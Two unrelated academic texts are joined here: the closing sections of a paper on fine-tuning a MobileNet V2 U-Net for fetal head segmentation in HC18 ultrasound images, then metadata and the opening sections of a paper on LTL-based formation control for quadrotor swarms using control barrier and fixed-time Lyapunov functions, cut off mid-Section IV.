U-Net network was the most effective fine-tuning strategy compared to the others we tested. ## 2 Related Work In recent years, DL techniques have been developed to achieve high precision outcomes in semantic segmentation tasks. Ronneberger et al. [14] proposed the U-Net architecture to perform biomedical image segmentation tasks with annotated samples more efficiently. In 2019, Howard et al. [13] constructed MobileNet V2 for semantic segmentation by making use of lightweight depth-wise separable convolutions to filter features. Therefore, it has a lower computational cost, less memory, and consumes less power. As a result, MobileNet V2 is a low-cost, efficient deep neural network suitable for mobile and embedded vision applications. In terms of US image segmentation tasks, [1] employs TL techniques to overcome limited and costly data issues in DL for medical applications. The authors investigate the impact of FT various layers of a pre-trained U-Net and assess their performance in fetal US image segmentation tasks on the HC18 US dataset. Their FT strategies consist of three schemes, FT shallow, deep layers, and the entire network. Across all US datasets analyzed in their work, FT the entire pre-trained U-Net yielded better results than training from scratch. [1] utilizes cross-domain TL with U-Net architecture for precise and fast image segmentation. The cross-domain TL techniques are utilized in [15] for the purpose of fetal head segmentation on HC18. The researchers have proposed a speedy and efficient method to produce a considerable number of annotated US images, based on a limited number of manually annotated biometrics. Besides cross-domain TL techniques, Alzubaidi et al. [1] demonstrated an ensemble TL technique with a segmentation model that includes eight CNN models. This technique is evaluated on the US dataset HC18 by achieving 98.53% mIoU. However, the ensemble TL model has 28.12 million trainable parameters, which is 7 times more than the best model we proposed with 4.4 million trainable parameters. [12] provides an overview study of TL methods on medical image classification. They demonstrated the efficacy of TL. The authors suggest that utilizing CNN models as feature extractors can save computational costs. Inspired by the investigation from [12], we think similar FT methods can be utilized in medical image segmentation. Our proposed FT strategy achieved competitive head segmentation results on HC18 with fewer trainable parameters and training epochs compared to existing SOTA methods, see Figure 0(b). The U-Net is a strong CNN architecture widely applied in medical image analysis. The most notable segmentation outcomes on the present HC18 leaderboard were obtained by leveraging U-Net and its expansion networks. Hence, we utilize U-Net architecture to construct a CNN model and evaluate our FT strategies. ## 3 Methodology **Data Preparation:** The HC18 dataset comprises a two-dimensional (2D) US image collection that has been split into 999 images for training purposes and 335 images for testing. All HC18 images are standard planes that are suitable for measuring fetal HC. Each of these images is of dimensions 800 by 540 pixels. Because these 999 images were annotated with biometrics by experienced medical experts, they were selected as the experimental dataset, whereby 799 images and 200 images were assigned for training and testing, respectively. 999 images were resized to 512 x 512 pixels. In this study, we used the standard data-augmentation techniques: rotation by an angle from [\(-25^{\circ}\),\(25^{\circ}\)], horizontal flipping, vertical flipping, and pixel normalization. **Model Design:** In our work, based on Ronneberger's work [14], we built a U-Net baseline model with 4 encoder layers, 4 decoder layers and 1 bottleneck. The model has input features [10, 12, 15, 51]. We apply a MobileNet V2 model to the U-Net's encoder part. The MobileNet V2 model was pre-trained on dataset ImageNet. **Fine-tuning Strategies:** Our FT methods include a collection of seven distinct schemes, see Figure 0(a). The baseline U-Net model has no pre-trained encoder and all layers unfrozen. The FT methods include training the entire decoder, the entire encoder, 0 layer within decoder, 0,1 layers within decoder, 0,1,2 layers within decoder, 2,3,4 layer within decoder, and 4 layer within decoder. In the baseline U-Net model, the encoder is not pre-trained and all layers remain unfrozen. The FT methods are comprised of a range of techniques, including training the entire decoder, the entire encoder, the layer 0 within the decoder, layers 0 to 1 within the decoder, layers 0 to 2 within the decoder, layers 2 to 4 within the decoder, and the layer 4 specifically within the decoder. In all experiments, the training and testing operations are executed four times repeatedly. **Training and Evaluation:** We implemented all of our experiments using Pytorch. After comparing performance between different CNN architectures, we train a U-Net model on HC18 from scratch by using Segmentation Models [1]. We trained the U-Net model with 20 epochs from scratch. Each epoch took around 75 seconds. Also, we fine-tuned the pre-trained U-Net with MobileNet V2 encoder with 20 epochs. Each epoch took around 25 seconds. The training dataset and test dataset both have a batch size of 10. The Adam optimiser was used in training processes with a decaying learning rate of \(1e-4\). All training processes were performed on an NVIDIA Tesla T4 graphics card. The typical metrics applied to evaluate the performance of segmentation models are Pixel Accuracy (PA), Dice coefficient, and Mean Intersection over Union (IoU). Mean IoU is defined as the average IoU over all classes \(K\). ## 4 Experimental Results Figure 0(c) summarises the segmentation metrics achieved through the implementation of various FT strategies on the HC18 test set, 200 fetal US images. The act of unfreezing the entire decoder within the pre-trained U-Net model has contributed to the generation of more accurate predictions on segmentation masks when compared to both the U-Net baseline model and other FT strategies. Our proposed FT strategy improved PA, Dice score, and mIoU by 0.45%, 0.75%, and 1.4% respectively when compared to training our U-Net baseline from scratch. Furthermore, the size of trainable parameters has been reduced by 85.8%. Despite the fact that the size of trainable parameters for other FT strategies is smaller than 4.4 million, our proposed FT strategy outperformed their evaluation results. In comparison to Amiri's methods, our proposed FT strategy has also yielded a 1.24% increase in their results (95.1%) [1] in terms of Dice score. Another FT strategy involving training U-Net pre-trained encoder only has also shown competitive results with a 96.22% Dice score. ## 5 Conclusion We presented a FT strategy for a pre-trained U-Net that enables accurate fetal head segmentation in US images while utilizing only 4.4 million parameters. To evaluate the effectiveness of various fine-tuning approaches, we conducted experiments on the HC18 Grand Challenge dataset. Our findings suggest that Figure 1: (a) The first row shows three fine-tuning strategies: U-Net baseline, 0 to 4 layers remain unfrozen within the decoder, and the encoder remains unfrozen. The second row shows three fine-tuning strategies: 0 layer remains unfrozen within the decoder, 0 to 1 layers remain unfrozen within the decoder, and 0 to 2 layers remain unfrozen within the decoder. The last row shows two fine-tuning strategies: 2 to 4 layers remain unfrozen within the decoder, 4 layer remains unfrozen within the decoder. (b) Comparison of our methods with the SOTA methods. (c) Comparison of Pixel Accuracy, Dice Score, and mIoU on Test data set. Mobilenet_v2\(*\) is the encoder with random weights. utilizing a pre-existing network enhances segmentation precision, whereas augmenting the amount of trainable parameters does not significantly impact accuracy. To reduce model size and the number of trainable parameters, we used the MobileNet V2 model as the encoder in our U-Net. Our fine-tuned model has significantly reduced 85.8% trainable parameters in comparison to training an initialized U-Net. Our research suggests that the ideal approach for FT is to adjust the decoder's 0, 1, 2, 3, 4 layers of the pre-trained U-Net based on our experiments. This methodology yielded a PA of 97.77%, a Dice coefficient of 96.28%, and a mIoU of 92.87% on the HC18 test dataset. Alternatively, FT the U-Net pre-trained encoder only is another TL method producing competitive results potentially. Our findings propose that adjusting the decoder of the U-Net might serve as an efficient approach for FT small models in US image analysis. ## 6 Future Work Future research may be conducted in order to reduce noise on US images by introducing image processing methods. And we will further investigate the resilience of the model that has been trained by TL techniques. Furthermore, we intend to investigate alternative pre-trained models in order to achieve an optimized model that is smaller in size. ## Acknowledgments This publication has emanated from research conducted with the financial support of Science Foundation Ireland under Grant number 18/CRT/6183. For the purpose of Open Access, the author has applied a CC BY public copyright licence to any Author Accepted Manuscript version arising from this submission.
2304.00275
Automated Formation Control Synthesis from Temporal Logic Specifications
In many practical scenarios, multi-robot systems are envisioned to support humans in executing complicated tasks within structured environments, such as search-and-rescue tasks. We propose a framework for a multi-robot swarm to fulfill complex tasks represented by temporal logic specifications. Given temporal logic specifications on the swarm formation and navigation, we develop a controller with runtime safety and convergence guarantees that drive the swarm to formally satisfy the specification. In addition, the synthesized controller will autonomously switch formations as necessary and react to uncontrollable events from the environment. The efficacy of the proposed framework is validated with a simulation study on the navigation of multiple quadrotor robots.
Shuhao Qi, Zengjie Zhang, Sofie Haesaert, Zhiyong Sun
2023-04-01T09:43:23Z
http://arxiv.org/abs/2304.00275v3
# Automated Formation Control Synthesis from Temporal Logic Specifications ###### Abstract In this paper, we propose a novel framework using formal methods to synthesize a navigation control strategy for a multi-robot swarm system with automated formation. The main objective of the problem is to navigate the robot swarm toward a goal position while passing a series of waypoints. The formation of the robot swarm should be changed according to the terrain restrictions around the corresponding waypoint. Also, the motion of the robots should always satisfy certain runtime safety requirements, such as avoiding collision with other robots and obstacles. We prescribe the desired waypoints and formation for the robot swarm using a temporal logic (TL) specification. Then, we formulate the transition of the waypoints and the formation as a deterministic finite transition system (DFTS) and synthesize a control strategy subject to the TL specification. Meanwhile, the runtime safety requirements are encoded using control barrier functions, and fixed-time control Lyapunov functions ensure fixed-time convergence. A quadratic program (QP) problem is solved to refine the DFTS control strategy to generate the control inputs for the robots, such that both TL specifications and runtime safety requirements are satisfied simultaneously. This work enlights a novel solution for multi-robot systems with complicated task specifications. The efficacy of the proposed framework is validated with a simulation study. ## I Introduction Nowadays, robots are required to accomplish more complicated tasks which should not only satisfy high-level task specifications but also ensure runtime safety requirements [1, 2]. Taking robot search and rescue as an example, the robots need to achieve a series of objectives, including locating the survivors, navigating to the rescue spots, and transporting the survivors to a designated safe zone [3]. The specification of the task may be multi-perspective or comprehensive. For example, the robots may be required to follow certain formations while moving toward the rescue spot. This means that the task specifications of the robot systems should be defined on multiple domains. Apart from the task specifications, multi-agent system control also needs to satisfy certain runtime safety requirements [4], such as collision avoidance with other robots and obstacles. Ensuring the satisfaction of both task specifications and runtime safety requirements is a valuable and interesting topic for the control of multi-agent systems. The task specifications of robotic systems are commonly described using temporal logic (TL) formulas [5] which are effective tools to describe the spatiotemporal constraints to prescribe the desired behavior of the system. The basic approach to synthesizing a controller for a dynamic system subject to a TL specification is the model-checking-based method that abstracts a deterministic finite transition system (DFTS) out of the original system and computes a symbolic controller by solving a game over the product of the DFTS and the automaton transformed from the TL specifications [6]. Then, the system controller can be solved by refining the symbolic controller [7]. Model-checking-based methods are commonly used for the control problems of multi-agent systems in which the tasks are specified using linear temporal logic (LTL) formulas [8, 9]. Also, optimization-based approaches are used to solve the control problems for multi-agent systems with signal temporal logic (STL) specifications, where the controller is obtained by solving a mixed-integer linear programming (MILP) problem [10]. STL specifications are also widely used for the control of multi-agent systems and solved by various methods, such as model predictive control [11], control barrier function [12], and funnel functions [13]. TL specifications are used for robot swarm systems for the design of controller [14] and communication strategies [15]. The runtime safety requirements of a dynamic system can be efficiently encoded using control barrier functions (CBF). It ensures the strict satisfaction of state-dependent constraints for dynamic systems by imposing the set invariance property [16]. A CBF is a Lyapunov-like function that can conveniently generate closed-form controllers that ensure safety without massive computation. Meanwhile, optimization-based methods like quadratic programming (QP) are also used together with CBF and CLF constraints to balance the system performance and the safety requirements [17]. Moreover, the CBF-QP formulation is extended to ensure collision-free behaviors in multi-robot systems [18]. Among the existing work, the variants of CBF and CLF considering temporal properties attract much attentions [19, 20], which are promising to solve problems with spatiotemporal constraints. Fixed-time [21] control Lyapunov function (CLF) and CBF are unified in the QP formulation to ensure fixed-time convergence and safety. Since the stability related to temporal property is guaranteed in these works, they are promising to solve the high-level missions specified by TL formulas. In [22], a method is proposed to automatically translate TL specifications into a CBF-QP problem to solve controllers for multi-robot swarm systems, which provides an example of incorporating task specifications and runtime safety requirements simultaneously in control synthesis. In this paper, we propose a novel framework to solve complicated autonomous navigation problems for multi-robot swarm systems with automated formation specified by LTL formulas. The navigation task has multiple objectives. Firstly, the robot swarm is required to reach a specific goal point in the environment while passing through a series of way-points. Secondly, the swarm should automatically change its formation according to the terrain restrictions of the environment. Thirdly, all robots in the swarm should strictly avoid collisions with other robots and obstacles. We use an LTL formula defined on multiple atomic propositions to specify the desired waypoints and formations of the swarm. Then, we formulate the transition of the waypoints and formations of the system as a DFTS and synthesize a symbolic control strategy by solving a game over the product of the DFTS and the automaton transformed from the LTL specification. Meanwhile, we use a group of CBFs and fixed-time CLFs to prescribe the runtime safety and the fixed-time convergence of the robot swarm. A QP problem is solved to generate the control inputs for individual robots by refining the symbolic control strategy. The refinement of the controller ensures the satisfaction of the predefined LTL specifications. Our main contribution is the proposed framework itself using formal methods and symbolic control strategies to solve practical complicated multi-robot tasks, especially the realization of the correspondence between the abstract transition model and the concrete multi-robot swarm system and how it helps achieve the objectives of the swarm navigation task. The framework and its realization are promising to be extended to other types of complex multi-robot coordinated tasks. The rest of the paper is organized as follows. Sec. II introduces the preliminary knowledge of this paper. Sec. III presents the framework of using formal control methods to solve complex tasks for multi-robot swarm systems and formally formulates the problem of this paper. In Sec. IV, we propose the solutions to this problem, namely the synthesis of the symbolic control strategy and the design of the robot controller by solving a QP problem. In Sec. V, we validate our framework and solutions with a simulation case on robot swarm navigation. Finally, Sec. VI concludes the paper. _Notation:_ We use \(\mathbb{R}\), \(\mathbb{R}^{+}\), and \(\mathbb{R}_{\geq 0}\) to represent the sets of real, positive real, and non-negative real numbers. We also use \(\mathbb{N}^{+}\) and \(\mathbb{N}_{\geq 0}\) to denote the sets of positive and non-negative integers. For a finite set \(\Xi\), we use \(|\Xi|\) to denote the total number of its elements. ## II Preliminaries In this section, we introduce the preliminary knowledge of this paper, including DFTS and LTL for the synthesis of a symbolic control strategy, and CBFs and fixed-time CLFs for the design of robot controllers. ### _Linear Temporal Logic (LTL)_ LTL is a formal language used to prescribe specifications. Consider a set of atomic propositions \(\mathsf{AP}=\{p_{1},\ldots,p_{N}\}\) which defines an alphabet \(2^{\mathsf{AP}}\), where each letter \(\pi\in 2^{\mathsf{AP}}\) contains the set of atomic propositions that are true. An infinite string of letters is a word \(\boldsymbol{\omega}=\omega_{0}\omega_{1}\omega_{2}\ldots\), where \(\omega_{i}\in 2^{\mathsf{AP}}\), \(i\in\mathbb{N}_{\geq 0}\), with a suffix \(\boldsymbol{\omega}_{k}=\omega_{k}\omega_{k+1}\omega_{k+2}\ldots\), \(k\in\mathbb{N}_{\geq 0}\). The syntax of LTL formulas is recursively defined as follows, \[\psi::=\top\mid p\mid\neg\psi\mid\psi_{1}\wedge\psi_{2}\mid\bigcirc\!\psi\mid \psi_{1}\mathcal{U}\psi_{2}, \tag{1}\] where \(\psi_{1}\), \(\psi_{2}\) and \(\psi\) are LTL formulas, \(p\in\mathsf{AP}\) is an atomic proposition, \(\neg\) is the negation operator, \(\wedge\) is the conjunction operator that connects two LTL formulas, and \(\bigcirc\) and \(\mathcal{U}\) represent the _next_ and _until_ temporal operators, respectively. Based on these essential operators, other logical and temporal operators, namely _disjunction_\(\vee\), _implication_\(\rightarrow\), _eventually_\(\lozenge\), and _always_\(\square\) can be defined as, \(\psi_{1}\vee\psi_{2}:=\neg(\psi_{1}\wedge\psi_{2})\), \(\psi_{1}\rightarrow\psi_{2}:=\neg\psi_{1}\vee\psi_{2}\), \(\lozenge\psi:=\neg\mathcal{U}\psi\), and \(\square\!\psi:=\neg\lozenge\neg\psi\). For a given word \(\boldsymbol{\omega}\), the semantics of LTL are given as * \(\boldsymbol{\omega}_{t}\models p\), if \(p\in\omega_{t}\); \(\boldsymbol{\omega}_{t}\models\neg p\), if \(p\notin\boldsymbol{\omega}_{t}\); * \(\boldsymbol{\omega}_{t}\models\psi_{1}\wedge\psi_{2}\), if \(\boldsymbol{\omega}_{t}\models\psi_{1}\) and \(\boldsymbol{\omega}_{t}\models\psi_{2}\); * \(\boldsymbol{\omega}_{t}\models\bigcirc\!\psi\), if \(\boldsymbol{\omega}_{t+1}\models\psi\); * \(\boldsymbol{\omega}_{t}\models\psi_{1}\mathcal{U}\psi_{2}\), if \(\exists\ i\in\mathbb{N}\) such that \(\boldsymbol{\omega}_{t+i}\models\psi_{2}\), and \(\boldsymbol{\omega}_{t+j}\models\psi_{1}\) holds \(\forall\,0\leq j<i\). ### _Deterministic Finite Transition System (DFTS)_ Now, we give the definition of a DFTS which is used to describe the abstract model of a continuous-state system. **Definition 1**: _(Deterministic Finite Transition System, DFTS): A deterministic finite transition system is a tuple \(\mathcal{T}=(S,A,\delta,\,\mathsf{AP},\,\mathcal{L})\), where \(S\) and \(A\) are finite sets of states and actions, \(\delta:S\!\times\!A\to S\) is a transition function that prescribes the state transition under a certain input, \(\mathsf{AP}\) is a finite set of atomic propositions, and \(\mathcal{L}\!:S\!\rightarrow\!2^{\mathsf{AP}}\) is a labeling function. \(\square\)_ Given a sequence of actions \(\mathbf{a}=a_{0}a_{1}a_{2}\cdots\) with \(a_{i}\in A\), a DFTS \(\mathcal{T}\) initiated at \(s_{0}\in S\) generates a trajectory or a run \(s_{0}s_{1}s_{2},\ldots\), where \(s_{i+1}=\delta(s_{i},a_{i})\), \(i\in\mathbb{N}_{\geq 0}\). Then, the output word of the DFTS \(\boldsymbol{\omega}=\omega_{0}\omega_{1}\omega_{2}\cdots\) is uniquely defined for a given initial state \(s_{0}\in S\), where \(\omega_{i}\in 2^{\mathsf{AP}}\), \(i\in\mathbb{N}_{\geq 0}\). For a DFTS \(\mathcal{T}\), its control strategy is defined as follows. **Definition 2** (Control Strategy): _A control strategy for a DFTS \(\mathcal{T}=(S,A,\delta,\mathsf{AP},\mathcal{L})\) is given by \((\Omega,S_{0})\), where \(\Omega:S^{+}\to A\) is a (history-dependent) control function defined on a finite, nonempty sequence of states \(S^{+}\) of \(\mathcal{T}\), and \(S_{0}\subseteq S\) is a set of initial states of \(\mathcal{T}\). \(\square\)_ ### _Fixed-Time Control Lyapunov Function (FxT CLF)_ Stability is a property that guarantees the system is driven to an equilibrium (or a set of equilibria). In contrast to asymptotic stability (AS) which pertains to convergence as time goes to infinity, finite-time stability is a concept that guarantees the convergence of solutions in finite time. Fixed-time stability (FxTS) is an even stronger notion than finite-time stability, where the time of convergence does not depend upon the initial conditions. Consider the control affine system as follows, \[\dot{x}(t)=f(x(t))+g(x(t))u(t), \tag{2}\] where \(x(t)\in\mathbb{X}\subset\mathbb{R}^{n}\) and \(u(t)\in\mathbb{U}\subset\mathbb{R}^{m}\) are, respectively, the low-level physical state and input of the system at time \(t\in\mathbb{R}_{\geq 0}\), \(f:\mathbb{R}^{n}\rightarrow\mathbb{R}^{n}\) is a smooth vector field, and \(g:\mathbb{R}^{n}\rightarrow\mathbb{R}^{n\times m}\) is the smooth gain matrix. Then, the convergence of the system trajectories to a compact set within a fixed time can be encoded using a class of fixed-time (FxT) CLFs [21]. **Definition 3**: _(Fixed-Time Control Lyapunov Function, FxT CLF): For a control affine system defined as (2), a continuously differentiable function \(V:\mathbb{R}^{n}\rightarrow\mathbb{R}\) is referred to as a fixed-time (FxT) CLF if \(V(x)\) is positive definite w.r.t \(\mathcal{X}\in\mathbb{X}\) and the following condition holds for all \(x\in\mathbb{X}\backslash\mathcal{X}\),_ \[\inf_{u\in\mathcal{U}}\left\{L_{f}V(x)+L_{g}V(x)u\right\}\leq-\alpha_{1}V(x)^ {\gamma_{1}}-\alpha_{2}V(x)^{\gamma_{2}}, \tag{3}\] _where \(\alpha_{1},\alpha_{2}\!>\!0\), \(\gamma_{1}\!=\!1\!+\!\frac{1}{\mu}\), \(\gamma_{2}\!=\!1\!-\!\frac{1}{\mu}\), \(\mu\!>\!1\). All control inputs \(u(t)\) that render an FxT-CLF ensure that the system state converges to \(x\in\mathcal{X}\) within a finite time \(T\) from any initial state \(x_{0}\!\in\!\mathbb{X}\), where \(T\!\leq\!\frac{\mu\pi}{2\sqrt{\alpha_{1}\alpha_{2}}}\!\leq\!T_{ud}\), \(T_{ud}\!\in\!\mathbb{R}^{+}\). \(\square\)_ ### _Control Barrier Function (CBF)_ The principle of safety demands the avoidance of dangerous occurrences, both in the present and future time. It is common to define the forward invariance of safe sets as safety. **Definition 4** (Forward Invariance): _A set \(\mathcal{C}\subset\mathbb{X}\) is forward invariant if \(\forall\,x_{0}\in\mathcal{C}\), \(x(t)\in\mathcal{C}\) for \(x(0)=x_{0}\) and all \(t>0\). The system \(\dot{x}=f(x)\) is safe with respect to the set \(\mathcal{C}\) if the set \(\mathcal{C}\) is forward invariant. \(\square\)_ In this work, we use the following notion of zeroing Control Barrier Functions (CBFs), introduced in [16], to ensure forward invariance of the safe set \(\mathcal{C}\). **Definition 5** ((Zeroing) Control Barrier Function, CBF): _Let \(\mathcal{C}\!\subset\!D\!\subset\!\mathbb{R}^{n}\) be the super-level set of \(a\) continuously differentiable function \(h:D\rightarrow\mathbb{R}\). Then \(h\) is a (zero) control barrier function if there exists an extended class \(\mathcal{K}_{\infty}\) function \(\alpha\) such that for the control affine system (2),_ \[\sup_{u\in U}\left[L_{f}h(x)+L_{g}h(x)u\right]\geq-\alpha(h(x)),\ \forall\,x\in D, \tag{4}\] _where extended class \(\mathcal{K}_{\infty}\) function is a strictly increasing function \(\alpha:\mathbb{R}\rightarrow\mathbb{R}\) with \(\alpha(0)=0\)._ _Furthermore, the condition of control inputs for the given CBF \(h\) is derived to ensure forward invariance,_ \[K_{\mathrm{cbf}}(x)=\left\{u\in U|L_{f}h(x)+L_{g}h(x)u+\alpha(h(x))\geq 0 \right\}. \tag{5}\] ## III Framework and Problem Statement In this section, we present the framework for using formal control methods to solve the automated navigation controller for a robot swarm, which is one of our main contributions. We specifically highlight the definitions of the robot swarm system, the abstract model of the system based on a DFTS, and how they are connected. Then, we formulate the problem to be solved in this paper formally. ### _Modeling Waypoints and Formation for a Robot Swarm_ Consider a multi-robot swarm system with \(N\in\mathbb{N}^{+}\) robots, where each robot has the following dynamic model, \[\mathcal{R}_{i}:\dot{x}_{i}(t)=f(x_{i}(t),u_{i}(t)),\quad i=1,\ldots,N, \tag{6}\] where \(x_{i}(t)\in\mathbb{X}\subset\mathbb{R}^{n},u_{i}(t)\in\mathbb{U}\subset \mathbb{R}^{m}\) are the state and the control input of the \(i\)-th robot at time \(t\in\mathbb{R}_{\geq 0}\), respectively, and \(f:\mathbb{R}^{n}\times\mathbb{R}^{m}\rightarrow\mathbb{R}^{n}\) is a smooth function that describes the dynamic model of the robot. For brevity, we use vectors \(x(t)=[\,x_{1}^{T}(t),\cdots,x_{N}^{T}(t)\,]^{T}\) and \(u(t)=[\,u_{1}^{T}(t),\cdots,u_{N}^{T}(t)\,]^{T}\) to denote the state and control input of all robots in the system. The interaction between the robots is described by an undirected graph \(\mathcal{G}=\{\mathcal{V},\mathcal{E}\}\), where \(\mathcal{V}=\{1,2,\cdots,N\}\) denotes the set of the robots and \(\mathcal{E}\subseteq\mathcal{V}\times\mathcal{V}\) is the set of edges of robot interactions, where \((i,j)\in\mathcal{E}\) if robots \(i\) and \(j\) are connected, \(i\neq j\). We define \(x_{c}=\frac{1}{N}\sum_{i=1}^{N}x_{i}\) as the geometric center or _centroid_ of the swarm. Also, if \((i,j)\in\mathcal{E}\), we define \(x_{ij}=x_{i}-x_{j}\) and \(u_{ij}=u_{i}-u_{j}\) as the relative displacement and control input difference between two robots \(i,j\in\mathcal{V}\), \(i\neq j\). The waypoints of the robot swarm are specified by a finite set \(F=\{w^{1},w^{2},\cdots,w^{N_{L}}\}\), where \(w^{k}\!\in\!\mathbb{R}^{n}\), \(k=1,2,\!\cdots\!,\!N_{W}\), and \(N_{W}\in\mathbb{N}^{+}\). For each waypoint \(w\in W\), we define a set \((w)=\{x\!\in\!\mathbb{R}^{n}|h_{\mathcal{W}}(x,w)\!\leq\!0\}\) to represent a circled region around \(w\), where \(h_{\mathcal{W}}(x,w)\!=\!\|x-w\|^{2}\!-\!d_{G}^{2}\), where \(d_{G}\!\in\!\mathbb{R}^{+}\) is a tolerance threshold. The swarm centroid \(x_{c}\) is required to follow a given waypoint \(w\) within the tolerance threshold, i.e., \(x_{c}\in\mathcal{W}(w)\). The formations of the robot swarm are also assigned by a finite set \(F=\{F^{1},F^{2},\cdots,F^{N_{F}}\}\), where \(F^{k}=\{f_{ij}^{k}\}_{|\mathcal{E}|}\), \(k=1,2,\cdots,N_{F}\), is a finite set of which each element \(f_{ij}^{k}\in\mathbb{R}^{n}\), \((i,j)\!\in\!\mathcal{E}\), prescribes the desired displacement between two robots to achieve a certain formation, and \(N_{F}\in\mathbb{N}^{+}\). For any \(F^{\prime}\in F\), we define a set \(\mathcal{F}(f_{ij})=\{x\in\mathbb{R}^{n}|h_{\mathcal{F}}(x,f_{ij})\leq 0\}\), where \(f_{ij}\in F^{\prime}\) and \((i,j)\in\mathcal{E}\), \(h_{F}(x,f_{ij})=\|x-f_{ij}\|^{2}-d_{F}^{2}\), where \(d_{F}\in\mathbb{R}^{+}\) is a tolerance threshold. The swarm needs to track the formation \(F^{\prime}\) within the tolerance threshold, i.e., \(x_{ij}\!\in\!\mathcal{F}(f_{ij})\), for all \(f_{ij}\!\in\!F^{\prime}\), \((i,j)\!\in\!\mathcal{E}\). The robot swarm should also satisfy the runtime safety requirements, i.e., collision avoidance with other robots and obstacles. We use \(d_{O}\in\mathbb{R}^{+}\) to represent the minimal distance between two interacted robots. Based on this, we define a safety set \(\mathcal{D}=\{x|h_{\mathcal{D}}(x)\geq 0\}\), where \(\mathcal{D}(x)=\|x\|^{2}-d_{O}^{2}\), where \(d_{O}\in\mathbb{R}^{+}\) is a tolerance threshold. Collision avoidance with other robots requires that \(x_{ij}\in\mathcal{D}\) for all \((i,j)\in\mathcal{E}\). Also, we use the set \(\mathcal{O}\!=\!\{x\in\mathbb{R}^{n}|h_{\mathcal{O}}(x)\!\geq\!0\}\) to represent the maximal ellipsoid collision-free region for the robot swarm, where \(h_{\mathcal{O}}(x)\!=\!1\!-\!(x\!-\!\eta)^{T}\!P(x\!-\!\eta)\), where \(\eta\!\in\!\mathbb{R}^{n}\) and \(P\!\in\mathbb{R}^{n\times n}\) are constant parameters determined by the environment. Collision avoidance with obstacles requires \(x_{c}\in\mathcal{O}\). ### _Abstraction of Waypoint and Formation Dynamics_ We use a DFTS \(\mathcal{T}=\{S,A,\delta,\mathsf{AP},\mathcal{L}\}\) introduced in Definition 1 to represent the transition of the waypoints and formations of the robot swarm system, where \(S=\tilde{W}\times\tilde{F}\) is the finite state space of \(\mathcal{T}\), where \(\tilde{W}\) and \(\tilde{F}\) are finite symbolic sets that abstract the waypoint set \(W\) and the formation set \(F\), respectively, where \(|\tilde{W}|=|W|\), \(|\tilde{F}|=|F|\), \(A\) is a finite set of actions of \(\mathcal{T}\), \(\delta:A\times\tilde{W}\times\tilde{F}\rightarrow\tilde{W}\times\tilde{F}\) prescribes the transition of the waypoints and the formations, \(\mathsf{AP}=\mathsf{AP}_{f}\times\mathsf{AP}_{w}\) is a complex atomic proposition set, where \(\mathsf{AP}_{f}\) and \(\mathsf{AP}_{w}\) are finite sets of atomic propositions related to the abstract waypoint set \(\tilde{W}\) and the abstract formation set \(\tilde{F}\), respectively, and \(\mathcal{L}=\{\mathcal{L}_{w},\mathcal{L}_{f}\}\), where \(\mathcal{L}_{w}:\tilde{W}\rightarrow\mathsf{2^{AP}}_{w}\) and \(\mathcal{L}_{f}:\tilde{F}\rightarrow\mathsf{2^{AP}}_{f}\) are labeling mappings. For any sequence of actions \(\mathbf{a}=a_{0}a_{1}a_{2}\cdots\), where \(a_{i}\in A\), \(i\in\mathbb{N}_{\geq 0}\), \(\mathcal{T}\) generates two state trajectories \(\mathbf{w}=w_{0}w_{1}w_{2}\cdots\) and \(\mathbf{f}=f_{0}f_{1}f_{2}\cdots\), where \(w_{i}\in W\), \(f_{i}\in F\), \(i\in\mathbb{N}_{\geq 0}\). Based on the labeling mappings \(\mathcal{L}_{w}\) and \(\mathcal{L}_{f}\), the changes of the waypoints and formations can now be translated to a complex word \(\boldsymbol{\omega}=(\omega_{0}^{w},\omega_{0}^{f})(\omega_{1}^{w},\omega_{1}^ {f})(\omega_{w}^{w},\omega_{2}^{f})\cdots\) on which we assign a LTL formula \(\psi\) that specifies the swarm navigation task, where \(\omega_{i}^{w}\in\mathsf{2^{AP}}_{w}\), \(\omega_{f}^{f}\in\mathsf{2^{AP}}_{f}\), \(i,j\in\mathbb{N}_{\geq 0}\). Then, we say that the waypoints and formations of the robot swarm satisfy the navigation task specification if \(\boldsymbol{\omega}\models\psi\). ### _Problem Statement_ Let a multi-robot swarm system (6) be given together with an LTL formula \(\psi\) that specifies the waypoints and formations of the swarm during the navigation task. The main objective of the swarm navigation control problem is to design a controller for each robot in the swarm, such that the swarm centroid reaches the waypoints with the corresponding formations as specified by \(\psi\), which is formally formulated as follows. **Problem 1** (Swarm Navigation with Automated Formation): _Given a system \(\mathcal{R}=\{\mathcal{R}_{1},\mathcal{R}_{2},\cdots,\mathcal{R}_{N}\}\) defined on a closed domain \(\mathbb{X}\subset\mathbb{R}^{n}\) as in (6), a DFTS \(\mathcal{T}\) defined as in Sec. III-B, and an LTL formula \(\psi\) defined on the paired word \(\boldsymbol{\omega}\) as defined in Sec. III-B, solve the following sub-problems._ 1. _Synthesize a symbolic control strategy_ \((\Omega,S_{0})\)_, such that for any feasible initial state_ \(s_{0}\in S_{0}\)_,_ \(\boldsymbol{\omega}\models\psi\)_, where_ \(S_{0}\) _is the largest satisfaction region of_ \(\mathcal{T}\times\psi\)___[_23_]__._ 2. _For each_ \(i\in\mathcal{V}\)_, design a controller_ \(u_{i}:S\rightarrow\mathbb{R}^{m}\)_, such that the following conditions hold within a fixed time, for any initial conditions_ \(x_{i}(0)\in\mathbb{X}\)_._ * _For any given waypoint_ \(w\!\in\!W\) _and formation_ \(F^{\prime}\!\in\!F\)_, achieve_ \(x_{c}\!\in\!\mathcal{W}(w)\) _and_ \(x_{ij}\!\in\!\mathcal{F}(f_{ij})\) _for all_ \(f_{ij}\in F^{\prime}\)_,_ \((i,j)\!\in\!\mathcal{E}\)_._ * _For any environmental perception_ \(\eta,P\)_, achieve_ \(x_{c}\in\mathcal{O}\) _and_ \(x_{ij}\in\mathcal{D}\)_, for all_ \((i,j)\in\mathcal{E}\)_._ The two sub-problems of Problem 1 prescribe the requirements for task specifications and runtime safety, respectively. The solution to this problem is given in the next section. ## IV Synthesis of Swarm Controller In this section, we present the solution to the framework and problem proposed in Sec. III. We first introduce the synthesis of a symbolic control strategy for a DFTS and an LTL specification, as prescribed by Problem 1-1). Then, we use QP to solve the robot controllers for Problem 1-2). ### _Symbolic Controller Synthesis_ This subsection discusses the synthesis of the symbolic control strategy for the swarm controller. To achieve this, we need to determine the waypoints and formations and realize the abstract model of the swarm system as a DFTS. The synthesis process is performed in three steps #### Iv-A1 Step 1: Determine the Waypoints and Formations The first step is to determine the waypoints and formations for the swarm navigation task, for which we need to make a relation between the swarm dynamic system (6) and the DFTS \(\mathcal{T}\) defined in Sec. III-B. For a certain swarm navigation problem on a closed region 